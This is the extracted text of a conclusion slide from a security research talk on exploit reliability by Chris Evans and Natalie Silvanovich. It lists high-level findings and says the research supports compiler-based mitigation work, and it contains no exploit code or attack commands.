Conclusion◆ Bug class and bug specifics dominate reliability questions◆ Even with a “good” bug, 100% reliable* exploits are hard◆ There are usually some factors that are difficult to control for◆ We’re using this research to help drive compiler-based mitigation work
![Page 73: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/73.jpg)
Questions?@scarybeasts@natashenka
http://googleprojectzero.blogspot.ca/